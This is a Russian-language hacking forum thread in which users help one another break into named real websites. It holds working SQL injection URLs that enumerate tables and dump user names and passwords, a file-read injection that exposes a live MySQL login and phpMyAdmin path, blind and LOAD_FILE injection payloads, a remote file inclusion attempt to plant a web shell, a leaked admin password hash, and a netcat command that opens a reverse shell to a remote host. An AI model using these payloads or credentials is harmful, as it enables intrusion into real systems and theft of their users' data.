Ваши вопросы по уязвимостям.

Code:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html

Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?

 

ограничение длины запроса. Вывод - никак по данной ссылке, даже при таком варианте:

Code:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4.html

вернее можно, элементарно, но так:

Code:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+and+substring(version(),1,1)=5.html

т.е. как бы вслепую

 

ПОмогите админку найти
http://www.rustrana.ru/

 

Чисто таблички user нету,

PHP:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat(table_schema,0x2E,table_name)+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.TABLES+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+and+table_name+LIKE+0x257573657225.html


karabas_svalka2.t_users
karabas_svalka2.t_users_activate

karabas_svalka2.t_users(в t_users_activate такие же колумны):

PHP:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(COLUMN_NAME+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='t_users'.html


id
email
passwd
user_type
creation_date
comment
name
phone
icq
id_city
id_country
bday
bmonth
byear
sex
id_prefix


ну не вижу в чем проблема вытаскивай например вот так с них:

PHP:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat_ws(0x3A,name,passwd)+separator+'%3Cbr%3E'),25,26,27,28,29,30,31,32,33,34+from+karabas_svalka2.t_users.html


2Byrger
Читалка файлов(как мило с их стороны )

PHP:

http://www.rustrana.ru/article.php?nid=3486853333+union+select+concat('/var/www/site3/public_html/connect.php',0x00),2,3,4,5,@@version,7,8,9,10,11,12,13,14,15--+


Реквизиты конекта MySQL:
USER:dbu_ansimov_1
PASS:BFzHAHAMz1K

Ну и сам phpMyAdmin - http://www.rustrana.ru/phpadm/

 

чтобы зайти в эти директории нужно быть в той же группе что и тот комп к примеру: MSHOME
и у тебя название и пароль учётки должен быть такой же как у того админа...

 

теперь проверь эти порты хspider'om на уязвимости

 

http://wow.homeline.kg/test/?apage=guilds&guid=102'
что тут можно сделать ? можно шелл залить ?

 

Code:

http://wow.homeline.kg/test/?apage=guilds&guid=102+and+substring(version(),1,1)=5

5-я ветка.

Code:

http://wow.homeline.kg/test/?apage=guilds&guid=102+union+select+1

1 колонка без вывода.

Code:

http://wow.homeline.kg/test/?apage=guilds&guid=102+and+ascii(substring((SELECT+file_priv+from+mysql.user+limit+0,1),1,1))=89

file_priv=Y.

Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)

 

Просто не нужно торопиться

http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,concat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+

http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,LOAD_FILE(0x633A2F626F6F742E696E69),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+

И ещё момент, file_priv так не проверяется. Тоесть в данном случае это прокатило, но ты же не знал, что база под рутом. Ты проверил его у первой записи в таблице, а это всегда (почти) рут. А нужно проверять у текущего юзера

 

Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз.
З.Ы. Порты разные пробовал, shell - r57
________________________________
added
Ещё вопросец.
Вытянул из джумлы админский пасс в хеше
Такого вида
(id,username,password)
62::admin::b3b05184a80b4915a7ea49f1b06cefcb:Z1RKNCslakgoAAuq55wasFVX8zGRYkIa
Солёный? Или?

 

Решил вспомнить молодость зашел на Майл.ру чат - и нефига чото у меня неотображает сообщения то

чо тако ??

 

фаер скорей всего и блочит. попробуй забиндить под бэккэнект уже открытый порт.

или я туплю, и нечего не выйдет?)) скорей всего ничего и не выйдет, ели фаер умный)

 

Зачем писать это в теме об уязвимостям? Это у тебя с браузером чото!

 

Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

и вот так

http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

Выводится пустая страница. В чем моя ошибка?

 

с чего ты взял что там php injection?

 

z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?

 

не факт
не обязательно если выходит ошибка при "page=blalbabla" то есть php injection

 

Как это-забиндить под бэкконнект? Если я смогу забиндить-то нах мне бэкконнект?
Просто мне нужно узнать, как например поставить бэкконнект не на мой ип, а на левую тачку, к которой у меня есть доступ (скажем так), или подобный вариант, т.к. я сижу за натом, как оказалось.

 

биндишь порт - не факт что приконектишься
для бекконекта неткатом
nc -v www.adres_deda.com -e /bin/sh &
на деде nc -l -p
помоему так

 

Что за ошибка то?